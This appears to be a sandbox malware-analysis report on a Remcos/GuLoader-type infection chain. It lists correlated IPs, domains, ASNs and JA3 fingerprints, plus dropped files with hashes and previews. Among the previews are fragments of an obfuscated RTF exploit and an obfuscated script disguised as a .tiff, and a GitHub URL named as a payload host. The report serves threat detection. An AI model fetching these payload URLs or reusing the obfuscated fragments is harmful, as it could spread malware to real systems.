                                                                                                                                                                            PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              45.90.89.98AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                gcnmTxDXTo.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                  17269374062ef5cc5f064187ae053742f15ea11eaf7fe116e75df3551c4709ce78e8f1419a932.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                    1726170845fe5c472375696bf668b3b528e9effd5f9dfb1a2108bcc6e243a091f1afc5c794629.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      xnHel.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                        PO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                          August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                185.199.109.133SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                                                                                                                SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt

                                                                                                                                                                                                Domains

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                og1.inPI#0034250924.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.21.78.54
                                                                                                                                                                                                SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.21.78.54
                                                                                                                                                                                                PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.21.78.54
                                                                                                                                                                                                PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.21.78.54
                                                                                                                                                                                                PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                • 104.21.78.54
                                                                                                                                                                                                raw.githubusercontent.comfile.exeGet hashmaliciousXWorm, XmrigBrowse
                                                                                                                                                                                                • 185.199.111.133
                                                                                                                                                                                                RFQ-5120240930 VENETA PESCA SRL.vbsGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                                                                • 185.199.110.133
                                                                                                                                                                                                SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                • 185.199.110.133
                                                                                                                                                                                                SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                • 185.199.111.133
                                                                                                                                                                                                C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 185.199.109.133
                                                                                                                                                                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 185.199.111.133
                                                                                                                                                                                                dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 185.199.111.133
                                                                                                                                                                                                4xBq1SMyQt.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                • 185.199.110.133
                                                                                                                                                                                                http://gasbot-demos.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 185.199.109.133
                                                                                                                                                                                                geoplugin.netSecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                z1Quotation.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                V1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                Invoice and packing list (021)_pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 178.237.33.50

                                                                                                                                                                                                ASNs

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                CMCSUSSERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 45.66.231.90
                                                                                                                                                                                                l.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 45.66.231.185
                                                                                                                                                                                                winx86.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 45.66.231.185
                                                                                                                                                                                                AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                                • 45.90.89.98
                                                                                                                                                                                                5qcJn1lfO5.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                                • 45.89.247.65
                                                                                                                                                                                                bF9JDHS47l.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 45.66.231.89
                                                                                                                                                                                                Ziraat Bankas#U0131 Swift Mesaj#U0131.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                                • 45.89.247.65
                                                                                                                                                                                                9FPFmh6r5t.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                • 45.66.231.104
                                                                                                                                                                                                gcnmTxDXTo.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                                • 45.90.89.98
                                                                                                                                                                                                FASTLYUSfile.exeGet hashmaliciousXWorm, XmrigBrowse
                                                                                                                                                                                                • 185.199.110.154
                                                                                                                                                                                                Payment_Notification-Sep27.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 151.101.2.137
                                                                                                                                                                                                https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfgGet hashmaliciousGRQ ScamBrowse
                                                                                                                                                                                                • 151.101.2.208
                                                                                                                                                                                                https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 151.101.2.137
                                                                                                                                                                                                https://www.curiosolucky.com/dos/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 151.101.194.137
                                                                                                                                                                                                https://magical-variation-300980.framer.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 151.101.130.137
                                                                                                                                                                                                https://magical-variation-300980.framer.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 151.101.194.137
                                                                                                                                                                                                INVOICE DUE..xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 151.101.66.137
                                                                                                                                                                                                https://content.app-us1.com/5zbe53/2024/09/30/8d9df716-ca99-47ed-825e-d3a2a0e6cd9e.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 151.101.2.137
                                                                                                                                                                                                CLOUDFLARENETUSfile.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                                                                • 172.67.69.226
                                                                                                                                                                                                Payment_Notification-Sep27.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                                XnQmVRj5g0.lnkGet hashmaliciousLonePageBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                Xkci1BfrmX.lnkGet hashmaliciousLonePageBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                Payment Advice Note_Pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                                                                                                                • 172.67.215.93
                                                                                                                                                                                                https://tracking.groovesell.com:443/t/1c336171327d66d10a047ef8cbabb880Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.18.22.177
                                                                                                                                                                                                3140, EUR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                http://email.app.loyalty.appstle.com/c/eJwczE2uLBEUAODVMHty6vgfGLxJ7YNCldsaadKJ3d_kbuCLDpJVWtPkDo1aHlqApo_j-QrGx0NGE5VRkkMwCbUEaa334GlxCCjAogErldDsyjIGyVXM-UCInAjwY7Dat69rMz_GXDWxq79pdc9aYxL-n-BJ8KylvUpjoXSC5_2T2iwlljsRPOnHhc--S1VIBHzvyVp-sdbpchGMyvkfJvbe8-mj5P2nfx3-BgAA__-UbkEqGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfgGet hashmaliciousGRQ ScamBrowse
                                                                                                                                                                                                • 104.21.27.6

                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                05af1f5ca1b87cc9cc9b25185115607dSYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                • 104.21.78.54
                                                                                                                                                                                                • 185.199.109.133
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 104.21.78.54
                                                                                                                                                                                                • 185.199.109.133
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 104.21.78.54
                                                                                                                                                                                                • 185.199.109.133
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 104.21.78.54
                                                                                                                                                                                                • 185.199.109.133
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                • 104.21.78.54
                                                                                                                                                                                                • 185.199.109.133
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                New Order.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                • 104.21.78.54
                                                                                                                                                                                                • 185.199.109.133
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                • 104.21.78.54
                                                                                                                                                                                                • 185.199.109.133
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                • 104.21.78.54
                                                                                                                                                                                                • 185.199.109.133
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 104.21.78.54
                                                                                                                                                                                                • 185.199.109.133
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                7dcce5b76c8b17472d024758970a406bPI#0034250924.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                Gelato Italiano_74695.exe.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 172.67.216.244
                                                                                                                                                                                                PO.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                • 172.67.216.244

                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                No context

                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):131072
                                                                                                                                                                                                Entropy (8bit):0.025623734588153504
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:I3DPcJ64SHvxggLRjOZNEvHRXv//4tfnRujlw//+GtluJ/eRuj:I3DPYGnOCvBvYg3J/
                                                                                                                                                                                                MD5:5D65BF2221243FB28855F824B066129B
                                                                                                                                                                                                SHA1:C06C438DE27EC2916CB11C696D61AFF9D631570A
                                                                                                                                                                                                SHA-256:F09D6501CE467A47318A59BD445C8CDD763804D08445BA37004D44CCE0A40396
                                                                                                                                                                                                SHA-512:9A535C1A5D53C9CD6B4B49F40C0911AB36484B64B99FAAD136CB4D3891A0F172BE8C03B59F0AA9252172FF74687878CF74FFE6BADE9769D61FBDE1D1A63AD9D8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:......M.eFy...z..#.hbI..9h..S,...X.F...Fa.q.................................yL......v............f..O...x.5^......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):4760
                                                                                                                                                                                                Entropy (8bit):4.834060479684549
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                                                                                                                                                MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                                                                                                                                                SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                                                                                                                                                SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                                                                                                                                                SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:@...e...........................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):962
                                                                                                                                                                                                Entropy (8bit):5.013811273052389
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                                MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                                                                                                                                                                SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                                                                                                                                                                SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                                                                                                                                                                SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:Rich Text Format data, version 1
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):115666
                                                                                                                                                                                                Entropy (8bit):2.7217050368726605
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:HbOllnkypEIfyvM33gbahiDgN16h6jifrQQW079:HalkypEIZngbawDgN8hF8Qr79
                                                                                                                                                                                                MD5:5EAD5713E1263695BFF52404264DD3B4
                                                                                                                                                                                                SHA1:19420DE3C322F058F5C55D6C2A18CF27BD2CE856
                                                                                                                                                                                                SHA-256:DC2E7684F8C21142383906E061BE62128064D2BE6C8EB15C773EAE3952615281
                                                                                                                                                                                                SHA-512:A4B678ECC350CABAB55DAC7D79B735CF9F2C79738037AE5BD1A290D13F5EEFF7E791B37F6A47FE9CF6D0BA061F8D3B0FD235C867B655EE378DB39D0D874B8906
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc, Author: ditekSHen
                                                                                                                                                                                                Preview:{\rtf1..{\*\2nTUYQGKZ0y8dcvDpsnpXT8iVux4FYmeXpoBGpNya1fq7GcDe6BXqFlwQNv4T8HJwNp6ZjGbwJlbjnucRbwM3X7HFOUWd7r2Pzv179oUlQfB8EjjNwU5qM417U4BQWP76BWjY9vuDsmMxcyqcdDTqlZRCB5pSOooBU00YjV9TDWvsyXCJCYKjmUof1uG}..{\17485111591[2251+);5/!@*:4_[?9`9.'|>!9<!^3%+^|~%*?+2<7%:.`?]1|?=,8%.~#/:%?<<!|$6%+?9%!2?.%=_]11''9?37%8~7?$/,#.&+2:/)_.';-]|?=!*)?*(]&44`1*.8?:@<_.$.,26=#6#`?^~$59></%~%%=*?4@.4=??24~?_=%.).^_^[*1|7#$*$%>78.$/.)7_]?,284)0+`/7*6>_+~55>*9;@=2|).&%6;?@/~./?.=,?313$!.~94#3.[[.~4_(?]:@~[`%##>!!`.7.$!+#.&,~=[#?*'_];^3][6!@|?;%8<@<])8.#-82>='_/7766:`8*_*`,~.?<82:[<%?%?/._2;[/?7?*.40,^.!?(@]%4^!:~.%-@(.4'58!.3:)(+.=?.-24?^?.;?=?`._[*$;^_;;8#.7='6:_**/56-;=%]58^,#.<*.%/*%8)(&#($%||!-.|8|`)0'!8.?[@(%&%;4-;%??[[96`=./077<.3.##(**7?.?)1=3.1'%.5*54~]`[0%&<$].?0;%2,)%:6$.`[+&2?%2[~7]]?_9$$8?.]??_.[5%)$05?.6%3|6.3?|@~.-::=<?;%|50;0^?.29[??_?_:#!.(%9[*'@51/2`?~!+/*..!-]?).^`?.?])=&#.'*@6?,[=/.~?@.?^?279;5=&'??'`|@;2[1^4*|0][7`3%$?..7(0<]^.8!18&[;,~243-:49!'#!.%0@(+.8.;2`??)?>02#*6%?&?,@^-7])9&.>?.+#[

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\picturewithherimagesverygoodforyourheart[1].tiff

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):247044
                                                                                                                                                                                                Entropy (8bit):3.7540611984178978
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:QT0K+XNr+WEx75gOUs5n7WgBzwmz7KTyXXcw5rN0gf:FK+Nr+WEbpL7BBzwS70yncw5rN0gf
                                                                                                                                                                                                MD5:AFA95FFEF9A1E2EE01B008DA56592B30
                                                                                                                                                                                                SHA1:9D5C767BB2F496377A5A797FC43E8C004530028C
                                                                                                                                                                                                SHA-256:4988DF74DF1AD4B83316BD4D9C110996BA2EB392C7C2ADB1422FFB60936611BE
                                                                                                                                                                                                SHA-512:632136F51D71D7632F70A5DADB1693801461C18C38357AD154B4BD51EE0D84E662952CE29B83996867C5716A2F8D3E325A693E88CD214B9383E9A2CE1ED57EF3
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:..L.l.i.k.N.k.f.R.e.C.q.C.K.L.U.B.G.e.u.c.f.z.f.P. .=. .".G.L.I.l.i.f.L.U.A.W.n.p.h.k.G.U.x.A.c.B.K.A.L.i.".....i.f.G.t.L.K.W.W.U.C.G.P.m.N.m.g.a.k.i.z.o.O.W.C. .=. .".e.R.K.t.W.u.C.G.W.K.W.K.B.c.O.P.j.i.P.W.O.L.l.i.".....K.W.x.z.L.f.k.A.f.N.m.T.f.W.a.L.f.g.T.c.O.i.h.i. .=. .".L.G.O.z.m.B.A.j.G.L.l.Q.G.W.o.h.f.z.W.W.k.P.U.s.".....C.W.Z.p.G.A.b.l.B.W.h.R.d.K.v.c.N.W.W.h.c.o.A.T. .=. .".o.U.a.U.e.W.h.W.c.K.C.T.c.I.d.c.q.a.h.U.a.R.h.B.".....i.L.U.x.d.z.m.L.u.i.q.x.c.c.A.L.C.v.N.c.i.o.U.A. .=. .".G.W.c.N.P.f.N.K.o.m.L.U.P.J.Z.h.O.d.p.p.C.o.i.K.".....c.L.t.U.N.c.C.x.e.W.Z.d.B.T.p.g.U.L.Z.W.q.b.U.K. .=. .".O.K.W.W.p.W.l.o.K.L.f.W.A.P.z.k.U.e.L.L.U.R.m.W.".....i.u.K.s.x.s.h.J.c.K.B.n.G.k.m.m.r.G.H.l.C.h.N.q. .=. .".G.k.c.f.U.k.W.i.h.z.R.z.G.G.C.L.C.U.c.Z.P.G.i.W.".....W.u.i.L.K.f.a.W.W.c.G.Z.W.Z.J.f.I.P.C.Z.O.f.h.N. .=. .".a.N.b.K.K.b.f.k.W.L.K.z.K.u.C.p.W.R.m.N.f.L.W.L.".....L.q.m.P.K.z.v.m.A.K.G.W.N.N.W.G.A.l.L.i.o.W.A.k. .=. .".s.S.Z.I.c.i.W.K.L.K.O.L.o.W.N.b.K.C.U.L.k.t.q.d.".....d.Q.z.O.

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4ADD57F9.emf

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):134544
                                                                                                                                                                                                Entropy (8bit):2.9989105127453892
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:SxZNfNMxUS1u40TiTKAvGNeni/m8xXZOm:oZNu6i0TiTKeYh/tTT
                                                                                                                                                                                                MD5:A01193C207CD2FE313F5CEDA3FD76B7A
                                                                                                                                                                                                SHA1:62173798263F9D7310F3F5942668DEA29AA5A90F
                                                                                                                                                                                                SHA-256:6E7BB9F3D39B5A50FA8FD08B066B0A92001BEAEAE96C9FCBFDB5BCFB9F0F6C20
                                                                                                                                                                                                SHA-512:6B4344CC538B502EF1F6D3C9FAF2973096B40054A0648078FEF21F451FF61A11906E9BEF01DE80EA4EE032EC8C17877FCC9FB05493512DC210FDA7C5F62F3E22
                                                                                                                                                                                                Malicious:false
